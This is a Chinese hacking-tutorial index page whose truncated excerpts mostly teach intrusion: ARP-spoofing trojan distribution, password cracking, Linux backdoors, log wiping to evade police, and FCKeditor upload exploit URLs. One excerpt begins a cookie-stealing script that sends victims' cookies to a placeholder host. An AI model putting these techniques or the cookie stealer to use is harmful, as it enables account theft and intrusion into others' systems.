网络安全

Microsoft SQL Server SA权限最新入侵方法

在获得SA密码后，往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用，无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象，用来管理本地资源，利用它可以不依靠CMD等命令就能添加一个管理员，具体代码如下：set wsnetwork=Cre...

安全教程 2022-02-17 49 0 最新入侵方法权限 &quot exec @f sp_oamethod @ret"
用ASP脚本命令重启服务器

家知道直接使用ASP是不能够重启服务器的，这时我们需要制作一个组件来实现功能，ASP通过这个组件调用系统API，然后按照不同的重启和关机方式进行操作！下面先说COM的制作，在VB中新建一工程，当然是AceiveX dll的！ 1）先修改工程属性，在工程属性窗口...

安全教程 2022-02-17 49 0 服务器命令脚本工程 ASP 模块 atype As Function 用来"
新的挂马方式-ARP欺骗

网页挂马最难的就是传播了，小网站易入侵但是访问人数不多，收获的肉鸡也就不是很多。因此，一种新的挂马方式开始流行——局域网ARP欺骗挂马，只要局域网内一台机子中招了，它就可以在内网传播含有木马的网页，捕获的肉鸡就会成几何增长。　　局域网ARP欺骗挂马的好处...

安全教程 2022-02-17 49 0 欺骗方式木马生成局域网服务网页肉鸡我们可以"
教你破解xp系统administrator权限

作者：Awolf首发：Awolf’S Security Blog一．事情起因那天满头大汗的把哥哥的电脑拿回来了。可是回到家一进入系统要密码，问了n次，密码都是错的。（忘记了）又加上我用usb键盘，用ghost系统盘破解破解程序时键盘无法使用无法进行破解，于是就有本文。...

安全教程 2022-02-17 34 0 权限系统破解 PE 密码 Windows 原理一个简单实践"
asp+js 偷取Cookies源代码

偷取Cookie，通过以下脚本引入一个js，document.write("<script src=XX.js></script>")，然后js内容为： var code;　　　　　　　　　 var target = "http://www.xxx.net/cookie.asp?"; info=escape(document.location+"@@@"+d...

安全教程 2022-02-17 43 0 asp js Cookies"
linux下mysql 5.x得到root密码后的另外一种利用方式

Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题，mysql5.x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的明天再看看函数手册，再装一个实验一下。mysql 5.x里面...

安全教程 2022-02-17 302 0 linux mysql root"
FCKeditor JSP版漏洞

FCKeditor的JSP版漏洞 http://www.iwyv.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F http://www.iwyv.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/conne...

安全教程 2022-02-17 27 0 FCKeditor JSP"
不用引号的字符注入和XSS

在字符型填字游戏中，'和＂往往是决定能否跳出约束进行攻击的关键，于是出现鸟转义字符　，可以把' ＂变成残废....这恰恰帮助我们改变了字符内部结构SQL Injection在MYSQL中登陆界面$db->query("Select * from a where...

安全教程 2022-02-17 43 0 注入字符不用 &quot &#039 &lt 我们 script&gt 登陆"
DNS协议欺骗攻击技术的攻防知识

你是否遭遇过这样的情况?当你在浏览器中输入正确的URL地址，但是打开的并不是你想要去的网站。它可能是114的查询页面，可能是一个广告页面，更可能是一个刷流量的页面，甚至是一个挂马的网站。如果你遇到了上述情况话，那么极有可能你遭遇了DNS欺骗，那么什么是DNS欺骗呢...

安全教程 2022-02-17 61 0 知识技术攻击协议欺骗 DNS 域名服务器 IP 地址一个"
linux下留本地后门的两个方法

方法一：setuid的方法，其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linu...

安全教程 2022-02-17 49 0 方法两个本地 root xiaoyu@localdomain test root@localdomain"
教你如何制作VB的P-Code调试器

P-Code简介术语P-Code既不是一个新名词也不是Microsoft的发明，P-Code只是简单地被解释执行的伪指令。因此，我们并不需要通过什么复杂的专业词汇来描述它。P-Code可以被认为是一种普通的机器级代码（我们的微处理器不能解释它）。在运行P-Code之前，需要一个解释器处...

安全教程 2022-02-17 35 0 调试制作如何我们 P-Code 一个 VB 虚拟指令操作"
PcAnywhere12提权方法

在早期的入侵提权中，我们经常可以看到使用利用安装PcAnywhere的服务器下载cif文件，然后使用明小子或者其他专用的密码读取工具进行读取控制密码的提权方法。这个应该算是PcAnywhere的一个硬伤了。而通常这个文件存在的目录是“C:Documents and SettingsAll Users...

安全教程 2022-02-17 41 0 方法文件可以 cif 然后密码目录一个本地我们读取"
教初学者如何把执行文件内存中的DLL的代码全部保存下来

有时，有些软件有保护，看不到他程序内部是怎么一个样,如果想简单的把他的内存保存下来！我写了一个简单的函数，调用一下就可以把DLL和EXE的内存里的信息全部导到文件里！到时再慢慢查吧！uses TlHelp32;procedure GetDLLMemToFile;var PID...

安全教程 2022-02-17 42 0 代码全部保存下来内存如何执行文件学者 Hand"
XSS攻击防御技术

1 背景知识1.1 什么是XSS攻击XSS攻击：跨站脚本攻击（Cross Site Scripting），为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给...

安全教程 2022-02-17 94 0 技术防御攻击 XSS 漏洞 Web 信息用户 Bob 类型脚本"
菜鸟必懂的木马连接原理

目前常见的木马有三种正向连接木马反弹连接木马收信木马　　正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他的端口。而我们要知道他的IP，才能够连接他。123就是他机器上开的端口　　由于到现在，宽带上网(动态IP)和路由器的普遍，这个软...

安全教程 2022-02-17 48 0 原理连接木马菜鸟机器 IP 我们就是无法路由器"
暴破SAM文件的提权法

通过WEBSEHLL，获取SAM文件，利用LC4，LC5等系列帐户HASK破解工具，破解出系统密码，利用3389远程连接，提升权限什么是SAM文件？简单来说SAM文件，就是保存系统中帐号的资料的文件，当然，也包括密码 SAM文件保存在%SYSTEMROOT%（windows）/SYSTEM32/CON...

安全教程 2022-02-17 199 0 文件 SAM LC5 破解下载密码系统本地 windows 可以"
社会工程学入侵三步走

大家一定知道超级黑客凯文·米特尼克吧，深为他的社会工程学所折服，美国国防部、五角大楼、中央情报局、北美防空系统……都是他闲庭信步的地方，没有人怀疑他的真实身份，对于他所想获得的信息如鱼得水，这便是社会工程学的魅力。当然，社会工程学不是那么困难难以撑...

安全教程 2022-02-17 48 0 入侵工程学社会信息我们一个他们目标所以弱点"
Asp脚本木马技术

现在很多的站点，为便于建站和后台管理，都使用ASP动态程序。但这也为整个站点的安全带来很大隐患，现在典型的网站攻击就是通过植入ASP木马，从而得到系统的控制权。早期的asp木马一般有数个文件，随着asp木马的易用性、隐蔽性以及强大的可执行性，因此得到越来越的黑客和...

安全教程 2022-02-17 47 0 技术木马脚本 &quot &lt 文件 asp &gt %&gt if 命令"
linux入侵踪迹隐藏攻略

前言：被警察叔叔请去喝茶时间很痛苦的事情，各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自己在系统中隐藏的更深，是我们必须掌握的基本功。当然，如果管理员真的想搞你而他的功力又足够足的话，相信没什么人能够真正的“踏雪无痕”。Fore...

安全教程 2022-02-17 48 0 攻略隐藏入侵我们 rm 文件 -rf 日志可以管理员系统"
教你如何突破IE安全限制获取iframe子框架内的本地cookie（图）

我的测试环境是： IE 7 (7.0.5730.13)以下所有的内容全部经过我在IE7中测试，是真实有效的结果。Iframe的限制:因为iframe这个玩意比较特殊，所以浏览器对它一般都有一些限制。首先父窗口不能控制子窗口的js，只能读取一些对象；子窗口也不能使用父窗...

安全教程 2022-02-17 55 0 框架本地获取限制突破安全如何 &quot &lt iframe"
后门程序技术知识全面讲解

什么是后门程序　　后门程序又称特洛伊木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其他电脑。　　后门是一种登录系统的方法，它...

安全教程 2022-02-17 70 0 全面讲解知识技术程序后门系统一个使用我们"
教你如何使用Google黑掉Windows服务器

在我的《为什么使用Google扫描安全漏洞》的技巧中，我讨论了如何使用Google.com来执行对你的面向公众的服务器的安全扫描――包括Windows、IIS、Apache和（但愿不会如此！）SQL Server。你能使用它得到服务器的信息、包含敏感信息的文件和检测出“暗藏的”登录页、服务器日...

安全教程 2022-02-17 50 0 服务器使用如何 Google 信息测试能够工具执行黑客"
关于趋势科技等网站被攻击的分析

一. 首先在网上找到了这次攻击的新闻报道http://www.nsfocus.net/news/6697 http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html 通过GOOGLE搜索到了相关被黑的页面http://www.google.cn/search?hl=zh-CN&q=site:trendmicro.com www.21...

安全教程 2022-02-17 85 0 分析攻击网站关于 &mdash 页面注入 SQL 修改当前"
黑客必懂的木马连接原理

目前常见的木马有三种正向连接木马反弹连接木马收信木马　　正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他的端口。而我们要知道他的IP，才能够连接他。123就是他机器上开的端口　　由于到现在，宽带上网(动态IP)和路由器的普遍，这个软...

安全教程 2022-02-17 51 0 原理连接木马黑客机器 IP 我们就是无法路由器"
phpMyAdmin table参数SQL注入漏洞

影响版本: phpMyAdmin phpmyadmin 3.x phpMyAdmin phpMyAdmin 2.11.x 漏洞描述: BUGTRAQ ID: 32720 phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。 phpMyAdmin的./phpmyadmin/libraries/db_table_exists.lib.php文件中没有正确地过滤table参数： $_result =...

安全教程 2022-02-17 62 0 phpMyAdmin table SQL注入"

8610 首页上一页 326 327 328 329 330 331 332 333 334 335 下一页尾页

网络安全

热门文章

最近发表

标签列表

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?140f68603cbfb8643906eda43fb35b59"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); | 桂ICP备2023010378号-4

Powered By EmpireCMS

| 桂ICP备2023010378号-4